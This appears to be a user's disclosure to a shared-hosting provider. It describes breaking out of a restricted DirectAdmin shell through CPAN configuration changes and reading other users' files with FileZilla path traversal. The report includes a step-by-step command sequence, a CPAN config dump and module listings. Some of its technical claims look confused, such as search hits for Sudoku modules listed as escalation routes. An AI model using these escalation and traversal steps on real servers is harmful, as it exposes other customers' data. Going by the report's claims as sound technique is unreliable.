Linux Restricted Shell Breakout & privilege escalation on Direct Admin using OpenSSH, CPAN shell and FileZilla.
Leveraging CPAN shell to change installation directory:
o conf commit makepl_perl INSTALL_BASE='/home/nelaar/perl' o conf commit mbuildpl_perl --install_base='/home/nelaar/perl' o conf commit
o conf commit makepl_PERL5LIB INSTALL_BASE='/home/nelaar/lib/perl5' o conf commit mbuildpl_PERL5LIB install_base='/home/nelaar/lib/perl5' o conf commit
o conf commit make_install_make_command 'sudo make' o conf commit mbuild_install_build_command 'sudo ./Build' o conf commit
Creating "sudo" shell commands for write/read privledge & nolock CPAN shell:
o conf commit make_install_make_command 'sudo make' o conf commit mbuild_install_build_command 'sudo ./Build' o conf commit
To gain root access by installing modules:
install Data::UUID o conf commit prerequisites_policy follow o conf commit
OutPut:
Module < App::LDAP::Command::Add::Sudoer (SHELLING/App-LDAP-0.1.2.tar.gz)
Module < App::LDAP::Command::Del::Sudoer (SHELLING/App-LDAP-0.1.2.tar.gz)
Module < App::LDAP::Command::Migrate::Sudoer (SHELLING/App-LDAP-0.1.2.tar.gz)
Module < App::LDAP::LDIF::Sudoer (SHELLING/App-LDAP-0.1.2.tar.gz)
Module < App::LDAP::ObjectClass::SudoRole (SHELLING/App-LDAP-0.1.2.tar.gz)
Module < ClearCase::ForceLockSudo (MGI/ClearCase-Wrapper-MGi-1.00.tar.gz)
Module < Doit::Sudo (SREZIC/Doit-0.025.tar.gz)
Module < IPC::ShellCmd::Sudo (BOBTFISH/IPC-ShellCmd-0.001.tar.gz)
Module < IPC::ShellCmd::Sudo (BOBTFISH/IPC-ShellCmd-0.001.tar.gz)
Module < Image::Leptonica::Func::sudoku (ZMUGHAL/Image-Leptonica-0.04.tar.gz)
Module < Koha::Contrib::Sudoc (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module < Koha::Contrib::Sudoc::BiblioReader (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module < Koha::Contrib::Sudoc::Converter (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module < Koha::Contrib::Sudoc::Koha (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module < Koha::Contrib::Sudoc::Loader (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module < Koha::Contrib::Sudoc::Loader::Authorities (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module < Koha::Contrib::Sudoc::Loader::Biblios (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module < Koha::Contrib::Sudoc::Localisation (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module < Koha::Contrib::Sudoc::PPNize::Reader (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module < Koha::Contrib::Sudoc::PPNize::Updater (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module < Koha::Contrib::Sudoc::Spool (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module < Koha::Contrib::Sudoc::TransferDaemon (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module < MYDan::Util::Sudo (LIJINFENG/MYDan-0.1.62.tar.gz)
Module < Object::Remote::Connector::LocalSudo (HAARG/Object-Remote-0.004001.tar.gz)
Module < Orbital::Transfer::Runnable::Sudo (ZMUGHAL/Orbital-Transfer-0.001.tar.gz)
Module < PasswordMonkey::Filler::Sudo (MSCHILLI/PasswordMonkey-0.09.tar.gz)
Module < Psh::Builtins::Sudo (GREGOR/psh-1.8.1.tar.gz)
Module < Rex::Interface::Exec::Sudo (FERKI/Rex-1.13.4.tar.gz)
Module < Rex::Interface::File::Sudo (FERKI/Rex-1.13.4.tar.gz)
Module < Rex::Interface::Fs::Sudo (FERKI/Rex-1.13.4.tar.gz)
Module < Rex::Sudo::File (FERKI/Rex-1.13.4.tar.gz)
Module < Spreadsheet::HTML::Presets::Sudoku (JEFFA/Spreadsheet-HTML-1.20.tar.gz)
Module < Sudo (WAG/Sudo-0.33.tar.gz)
Module < Text::SuDocs (CFOUTS/Text-SuDocs-0.014.tar.gz)
Module < Unix::Sudo (DCANTRELL/Unix-Sudo-4.567.89.tar.gz)
Module < Vulcan::Sudo (KAN/pantheon-0.58.tar.gz)
Module < eris::log::context::sudo (BLHOTSKY/eris-0.008.tar.gz)
Module < install (DAGOLDEN/install-0.01.tar.gz)
Use FileZilla to unblock hidden files and folders. Search recursively, remotely using dot-dot-slash (../), sequences or absolute path variations to access arbitrary files and directories stored on the server cluster. Also known as Directory Path Transveral to obtain application source code, configuration files and critical information such as system files.
Discovery
#John:
##"Set up a kvm vps, and if say you want to run your own email start with https://github.com/mailcow/mailcow-dockerized/ and then you can do any other docker containers as well."
#h4xr0x:
##This is along the lines of what I was thinking. Awesome suggestion and thank you for the fast reply during the holidays.
#John:
##"I think there could be issues trying to get da and docker working together."
#h4xr0x:
##I am able to install composer, use symphony and embed dockerized containers set up as virtual terminals in Nextcloud through the external sites plugin. Using the CPAN shell its possible to configure global configurations and elevate privilege by o conf commit make_install_make_command 'sudo make & o conf commit
mbuild_install_build_command 'sudo ./Build'
Albeit, even without editing any configuration files, you can still install modules by accessing the cpan shell by navigating to the root installation directories and running commands: cpan
enters shell. autobundle
lists available modules, get upgrade
, install upgrade
, Installs modules and o conf
lists access to user's global configuration.
##I had installed some 20 gb of pearl modules when I went to restore my Nextcloud backup. I observed my backup transfered 2 gb and should have been around 11 mb. autobundle
created a snapshot of the entire server. That's when I realized I had backed up every disk on da600.is.cc. You can view this in screenshot: i.is.cc/17pJm2qN.png | or system logs: In cpan shell you can add to or change any configurations listed. I didn't change any configurations beyond my project's scope. Pentesting was not malicious intention. I came across this honestly trying to see if I could make direct admin work as we discussed.
##I can access the entire cluster, every disk, every user, via SSH & FTP searching directories recursively or by path transversal. CPAN works like a built-in cheat for those who do not have write access. You can see this in my Nextcloud under "settings/ administration/ system" [ screenshots: i.is.cc/17hhoeTQ.png | i.is.cc/17hrcLC2.png | i.is.cc/17hBOhsk.png | i.is.cc/17hOmQQE.png ] You may access my NextCloud at #https://gamesense.cloud for confirmation.
##Additionally there's documentation for many modules that I didn't install, but were added to my $home dir. Some projects document how to "hack" directadmin with perl; you can search "HACKERS" for this document in my local directory. I can run all queries, commands and tests as if I was a root user of the entire cluster. Heres some interesting Dir's [ .cpan | perl5 | /home/admin/ | wwwroot | /home/ | /home/nelaar/ |usr/bin | /usr/directadmin]
Enviorment:[ Webhosting plan without root access or R/W privledges outside of /home/ dir]
` In this set up we have dropped cloudlinux and cpanel. Instead ubuntu 20 is used with bubblewrap (https://github.com/containers/bubblewrap) for sandboxing accounts and preventing access to any other files. This is done for the webserver, which remains litespeed, as well as ssh.
` Kernelcare is kept as with cpanel servers, with the addition of libcare, to patch openssl and glibc updates with out a restart as well as the kernel.
` Imunify360 security remains.
` jetbackup is used as well, but jetbackup5 replacing jetbackup4.
` Softaculous remains for the autoinstaller.
` Clamav remains for email incoming. Spamassassin is replaced with rspamd.
Hacking: what I did, what you can do to reproduce the steps OpenSSH Terminal and type the following commands:
cpan
autobundle
install upgrade
o conf commit makepl_perl INSTALL_BASE='/home/nelaar/perl'
o conf commit mbuildpl_perl --install_base='/home/nelaar/perl'
o conf commit
o conf commit makepl_PERL5LIB INSTALL_BASE='/home/nelaar/lib/perl5'
o conf commit mbuildpl_PERL5LIB install_base='/home/nelaar/lib/perl5'
o conf commit
o conf commit make_install_make_command 'sudo make'
o conf commit mbuild_install_build_command 'sudo ./Build'
o conf commit
install Data::UUID
o conf commit prerequisites_policy follow
o conf commit
perl Makefile.PL
make
make test
i /sudo/ make install
i /sudo/ install Data::UUID
o conf prerequisites_policy follow
o conf commit
Lets take a look at my "NO LOCK CPAN" Configuration file by running:"o conf"
cpan shell -- CPAN exploration and modules installation (v2.22)
nolock_cpan[2]> o conf
$CPAN::Config options from /home/.cpan/CPAN/MyConfig.pm:
commit [Commit changes to disk]
defaults [Reload defaults from disk]
help [Short help about 'o conf' usage]
init [Interactive setting of all options]
applypatch []
auto_commit [0]
build_cache [100]
build_dir [/home/.cpan/build]
build_dir_reuse [0]
build_requires_install_policy [yes]
bzip2 [/usr/bin/bzip2]
cache_metadata [1]
check_sigs [0]
cleanup_after_install [0]
colorize_debug undef
colorize_output [0]
colorize_print undef
colorize_warn undef
commandnumber_in_prompt [1]
commands_quote undef
connect_to_internet_ok [1]
cpan_home [/home/.cpan]
curl [/home/]
dontload_hash undef
dontload_list undef
ftp undef
ftp_passive [1]
ftp_proxy []
ftpstats_period undef
ftpstats_size undef
getcwd [cwd]
gpg [/usr/bin/gpg]
gzip [/usr/bin/gzip]
halt_on_failure [0]
histfile [/home/.cpan/histfile]
histsize [100]
http_proxy []
inactivity_timeout [0]
index_expire [1]
inhibit_startup_message [0]
keep_source_where [/home/.cpan/sources]
load_module_verbosity [none]
lynx undef
make [mbuildpl_arg]
make_arg []
make_install_arg []
make_install_make_command [sudo make]
makepl_arg [INSTALL_BASE=/home/nelaar/perl]
mbuild_arg []
mbuild_install_arg []
mbuild_install_build_command [sudo ./build]
mbuildpl_arg [--installdirs site]
ncftp undef
ncftpget undef
no_proxy []
pager [/usr/bin/less]
password undef
patch [/usr/bin/patch]
patches_dir [/home/usr/bin/patch]
perl5lib_verbosity [none]
plugin_list
prefer_external_tar [1]
prefer_installer [MB]
prefs_dir [/home/.cpan/prefs]
prerequisites_policy [follow]
proxy_pass undef
proxy_user undef
randomize_urllist undef
recommends_policy [1]
scan_cache [atstart]
shell [/usr/bin/jailshell]
show_unparsable_versions [0]
show_upload_date [0]
show_zero_versions [0]
suggests_policy [0]
tar [/usr/bin/tar]
tar_verbosity [none]
term_is_latin [1]
term_ornaments [1]
test_report [0]
trust_test_report_history [0]
unzip [/usr/bin/unzip]
urllist
0 [make]
1 [ftp://208.73.202.150/]
use_prompt_default [0]
use_sqlite [0]
username [sudo]
version_timeout [15]
wait_list undef
wget [/usr/bin/wget]
yaml_load_code [make_biuld_YAML]
yaml_module [YAML]
nolock_cpan[3]>
Gives me the following options interesting options now that I can use sudo:
i /sudo/ install Data::UUID
Distribution ABIGAIL/Regexp-Sudoku-2022022401.tar.gz
Distribution ABIGAIL/Regexp-Sudoku-2022030401.tar.gz
Distribution BOBO/Games-Sudoku-Lite-0.41.tar.gz
Distribution CFOUTS/Text-SuDocs-0.014.tar.gz
Distribution CGUINE/Games-Sudoku-SudokuTk-0.14.tar.gz
Distribution COPE/Games-Sudoku-OO-0.03.tar.gz
Distribution DCANTRELL/Unix-Sudo-4.567.89.tar.gz
Distribution FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz
Distribution ISHIGAKI/Games-Sudoku-Component-0.02.tar.gz
Distribution ISHIGAKI/Games-Sudoku-Component-TkPlayer-0.02.tar.gz
Distribution MARTYLOO/Games-Sudoku-CPSearch-1.00.tar.gz
Distribution MEHNER/Games-Sudoku-Solver-1.1.0.tar.gz
Distribution PERLANCAR/Acme-CPANModules-Sudoku-0.007.tar.gz
Distribution SZABGAB/Games-Sudoku-CLI-0.02.tar.gz
Distribution VELASCO/Games-Sudoku-Kubedoku.tar.gz
Distribution WAG/Sudo-0.33.tar.gz
Distribution WITTROCK/Games-Sudoku-Preset-v0.1.0.tar.gz
Distribution WITTROCK/SudokuTrainer-0.01.5.tar.gz
Distribution WYANT/Games-Sudoku-General-0.027.tar.gz
Distribution WYLLIE/Games-YASudoku-0.01.tar.gz
Module < Acme::CPANModules::Sudoku (PERLANCAR/Acme-CPANModules-Sudoku-0.007.tar.gz)
Module < App::LDAP::Command::Add::Sudoer (SHELLING/App-LDAP-0.1.2.tar.gz)
Module < App::LDAP::Command::Del::Sudoer (SHELLING/App-LDAP-0.1.2.tar.gz)
Module < App::LDAP::Command::Migrate::Sudoer (SHELLING/App-LDAP-0.1.2.tar.gz)
Module < App::LDAP::LDIF::Sudoer (SHELLING/App-LDAP-0.1.2.tar.gz)
Module < App::LDAP::ObjectClass::SudoRole (SHELLING/App-LDAP-0.1.2.tar.gz)
Module < ClearCase::ForceLockSudo (MGI/ClearCase-Wrapper-MGi-1.00.tar.gz)
Module < Data::UUID (RJBS/Data-UUID-1.226.tar.gz)
Module < Doit::Sudo (SREZIC/Doit-0.025.tar.gz)
Module < Games::Sudoku::CLI (SZABGAB/Games-Sudoku-CLI-0.02.tar.gz)
Module < Games::Sudoku::CPSearch (MARTYLOO/Games-Sudoku-CPSearch-1.00.tar.gz)
Module < Games::Sudoku::Component (ISHIGAKI/Games-Sudoku-Component-0.02.tar.gz)
Module < Games::Sudoku::Component::Base (ISHIGAKI/Games-Sudoku-Component-0.02.tar.gz)
Module < Games::Sudoku::Component::Controller (ISHIGAKI/Games-Sudoku-Component-0.02.tar.gz)
Module < Games::Sudoku::Component::Controller::History (ISHIGAKI/Games-Sudoku-Component-0.02.tar.gz)
Module < Games::Sudoku::Component::Controller::Loader (ISHIGAKI/Games-Sudoku-Component-0.02.tar.gz)
Module < Games::Sudoku::Component::Controller::Status (ISHIGAKI/Games-Sudoku-Component-0.02.tar.gz)
Module < Games::Sudoku::Component::Result (ISHIGAKI/Games-Sudoku-Component-0.02.tar.gz)
Module < Games::Sudoku::Component::Table (ISHIGAKI/Games-Sudoku-Component-0.02.tar.gz)
Module < Games::Sudoku::Component::Table::Cell (ISHIGAKI/Games-Sudoku-Component-0.02.tar.gz)
Module < Games::Sudoku::Component::Table::Item (ISHIGAKI/Games-Sudoku-Component-0.02.tar.gz)
Module < Games::Sudoku::Component::Table::Permission (ISHIGAKI/Games-Sudoku-Component-0.02.tar.gz)
Module < Games::Sudoku::Component::TkPlayer (ISHIGAKI/Games-Sudoku-Component-TkPlayer-0.02.tar.gz)
Module < Games::Sudoku::Component::TkPlayer::Controller (ISHIGAKI/Games-Sudoku-Component-TkPlayer-0.02.tar.gz)
Module < Games::Sudoku::Component::TkPlayer::Selector (ISHIGAKI/Games-Sudoku-Component-TkPlayer-0.02.tar.gz)
Module < Games::Sudoku::Component::TkPlayer::Splashscreen (ISHIGAKI/Games-Sudoku-Component-TkPlayer-0.02.tar.gz)
Module < Games::Sudoku::Component::TkPlayer::View (ISHIGAKI/Games-Sudoku-Component-TkPlayer-0.02.tar.gz)
Module < Games::Sudoku::General (WYANT/Games-Sudoku-General-0.027.tar.gz)
Module < Games::Sudoku::Kubedoku (VELASCO/Games-Sudoku-Kubedoku.tar.gz)
Module < Games::Sudoku::Lite (BOBO/Games-Sudoku-Lite-0.41.tar.gz)
Module < Games::Sudoku::OO::Board (COPE/Games-Sudoku-OO-0.03.tar.gz)
Module < Games::Sudoku::OO::Cell (COPE/Games-Sudoku-OO-0.03.tar.gz)
Module < Games::Sudoku::OO::Set (COPE/Games-Sudoku-OO-0.03.tar.gz)
Module < Games::Sudoku::OO::Set::Column (COPE/Games-Sudoku-OO-0.03.tar.gz)
Module < Games::Sudoku::OO::Set::Row (COPE/Games-Sudoku-OO-0.03.tar.gz)
Module < Games::Sudoku::OO::Set::Square (COPE/Games-Sudoku-OO-0.03.tar.gz)
Module < Games::Sudoku::Preset (WITTROCK/Games-Sudoku-Preset-v0.1.0.tar.gz)
Module < Games::Sudoku::Solver (MEHNER/Games-Sudoku-Solver-1.1.0.tar.gz)
Module < Games::Sudoku::SudokuTk (CGUINE/Games-Sudoku-SudokuTk-0.14.tar.gz)
Module < Games::Sudoku::Trainer::Cell (WITTROCK/SudokuTrainer-0.01.5.tar.gz)
Module < Games::Sudoku::Trainer::General_info (WITTROCK/SudokuTrainer-0.01.5.tar.gz)
Module < Games::Sudoku::Trainer::Nextvalue (WITTROCK/SudokuTrainer-0.01.5.tar.gz)
Module < Games::Sudoku::Trainer::Obstacle (WITTROCK/SudokuTrainer-0.01.5.tar.gz)
Module < Games::Sudoku::Trainer::Run (WITTROCK/SudokuTrainer-0.01.5.tar.gz)
Module < Games::Sudoku::Trainer::Training (WITTROCK/SudokuTrainer-0.01.5.tar.gz)
Module < Games::YASudoku (WYLLIE/Games-YASudoku-0.01.tar.gz)
Module < Games::YASudoku::Board (WYLLIE/Games-YASudoku-0.01.tar.gz)
Module < Games::YASudoku::Square (WYLLIE/Games-YASudoku-0.01.tar.gz)
Module < IPC::ShellCmd::Sudo (BOBTFISH/IPC-ShellCmd-0.001.tar.gz)
Module < Image::Leptonica::Func::sudoku (ZMUGHAL/Image-Leptonica-0.04.tar.gz)
Module < Koha::Contrib::Sudoc (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module < Koha::Contrib::Sudoc::BiblioReader (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module < Koha::Contrib::Sudoc::Converter (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module < Koha::Contrib::Sudoc::Koha (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module < Koha::Contrib::Sudoc::Loader (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module < Koha::Contrib::Sudoc::Loader::Authorities (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module < Koha::Contrib::Sudoc::Loader::Biblios (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module < Koha::Contrib::Sudoc::Localisation (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module < Koha::Contrib::Sudoc::PPNize::Reader (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module < Koha::Contrib::Sudoc::PPNize::Updater (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module < Koha::Contrib::Sudoc::Spool (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module < Koha::Contrib::Sudoc::TransferDaemon (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module < MYDan::Util::Sudo (LIJINFENG/MYDan-0.1.62.tar.gz)
Module < Object::Remote::Connector::LocalSudo (HAARG/Object-Remote-0.004001.tar.gz)
Module < Orbital::Transfer::Runnable::Sudo (ZMUGHAL/Orbital-Transfer-0.001.tar.gz)
Module < PasswordMonkey::Filler::Sudo (MSCHILLI/PasswordMonkey-0.09.tar.gz)
Module < Psh::Builtins::Sudo (GREGOR/psh-1.8.1.tar.gz)
Module < Regexp::Sudoku (ABIGAIL/Regexp-Sudoku-2022030401.tar.gz)
Module < Regexp::Sudoku::Constants (ABIGAIL/Regexp-Sudoku-2022022401.tar.gz)
Module < Rex::Interface::Exec::Sudo (FERKI/Rex-1.13.4.tar.gz)
Module < Rex::Interface::File::Sudo (FERKI/Rex-1.13.4.tar.gz)
Module < Rex::Interface::Fs::Sudo (FERKI/Rex-1.13.4.tar.gz)
Module < Rex::Sudo::File (FERKI/Rex-1.13.4.tar.gz)
Module < Spreadsheet::HTML::Presets::Sudoku (JEFFA/Spreadsheet-HTML-1.20.tar.gz)
Module < Sudo (WAG/Sudo-0.33.tar.gz)
Module < Text::SuDocs (CFOUTS/Text-SuDocs-0.014.tar.gz)
Module < Unix::Sudo (DCANTRELL/Unix-Sudo-4.567.89.tar.gz)
Module < Vulcan::Sudo (KAN/pantheon-0.58.tar.gz)
Module < eris::log::context::sudo (BLHOTSKY/eris-0.008.tar.gz)
Module < install (DAGOLDEN/install-0.01.tar.gz)
Author YISUDONG ("YisuDong" <YisuDong@gmail.com>)
101 items found
I checked and could install the following; of which, a non-root user like myself should not have access to outside their /home/dir. adding sudo command elevate my privileges; the following had I installed - would escalate that:
Module < App::LDAP::Command::Add::Sudoer (SHELLING/App-LDAP-0.1.2.tar.gz)
Module < App::LDAP::Command::Del::Sudoer (SHELLING/App-LDAP-0.1.2.tar.gz)
Module < App::LDAP::Command::Migrate::Sudoer (SHELLING/App-LDAP-0.1.2.tar.gz)
Module < App::LDAP::LDIF::Sudoer (SHELLING/App-LDAP-0.1.2.tar.gz)
Module < App::LDAP::ObjectClass::SudoRole (SHELLING/App-LDAP-0.1.2.tar.gz)
Module < ClearCase::ForceLockSudo (MGI/ClearCase-Wrapper-MGi-1.00.tar.gz)
Module < Doit::Sudo (SREZIC/Doit-0.025.tar.gz)
Module < IPC::ShellCmd::Sudo (BOBTFISH/IPC-ShellCmd-0.001.tar.gz)
Module < IPC::ShellCmd::Sudo (BOBTFISH/IPC-ShellCmd-0.001.tar.gz)
Module < Image::Leptonica::Func::sudoku (ZMUGHAL/Image-Leptonica-0.04.tar.gz)
Module < Koha::Contrib::Sudoc (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module < Koha::Contrib::Sudoc::BiblioReader (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module < Koha::Contrib::Sudoc::Converter (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module < Koha::Contrib::Sudoc::Koha (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module < Koha::Contrib::Sudoc::Loader (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module < Koha::Contrib::Sudoc::Loader::Authorities (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module < Koha::Contrib::Sudoc::Loader::Biblios (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module < Koha::Contrib::Sudoc::Localisation (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module < Koha::Contrib::Sudoc::PPNize::Reader (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module < Koha::Contrib::Sudoc::PPNize::Updater (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module < Koha::Contrib::Sudoc::Spool (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module < Koha::Contrib::Sudoc::TransferDaemon (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module < MYDan::Util::Sudo (LIJINFENG/MYDan-0.1.62.tar.gz)
Module < Object::Remote::Connector::LocalSudo (HAARG/Object-Remote-0.004001.tar.gz)
Module < Orbital::Transfer::Runnable::Sudo (ZMUGHAL/Orbital-Transfer-0.001.tar.gz)
Module < PasswordMonkey::Filler::Sudo (MSCHILLI/PasswordMonkey-0.09.tar.gz)
Module < Psh::Builtins::Sudo (GREGOR/psh-1.8.1.tar.gz)
Module < Rex::Interface::Exec::Sudo (FERKI/Rex-1.13.4.tar.gz)
Module < Rex::Interface::File::Sudo (FERKI/Rex-1.13.4.tar.gz)
Module < Rex::Interface::Fs::Sudo (FERKI/Rex-1.13.4.tar.gz)
Module < Rex::Sudo::File (FERKI/Rex-1.13.4.tar.gz)
Module < Spreadsheet::HTML::Presets::Sudoku (JEFFA/Spreadsheet-HTML-1.20.tar.gz)
Module < Sudo (WAG/Sudo-0.33.tar.gz)
Module < Text::SuDocs (CFOUTS/Text-SuDocs-0.014.tar.gz)
Module < Unix::Sudo (DCANTRELL/Unix-Sudo-4.567.89.tar.gz)
Module < Vulcan::Sudo (KAN/pantheon-0.58.tar.gz)
Module < eris::log::context::sudo (BLHOTSKY/eris-0.008.tar.gz)
Module < install (DAGOLDEN/install-0.01.tar.gz)
Conclusion:
I didn't install or go beyond scope of my development needs. I am sure that with permission to, I would find and could document known and unknown CVE's on "edited for privacy" . I am sure that you are already aware of this, there might even be great reasons for it. I must ask, If you will answer the following questions I would appreciate very much:
Network: "edited for privacy" Hostname: "edited for privacy" DNS: "edited for privacy" Gateway: "edited for privacy"
#Impact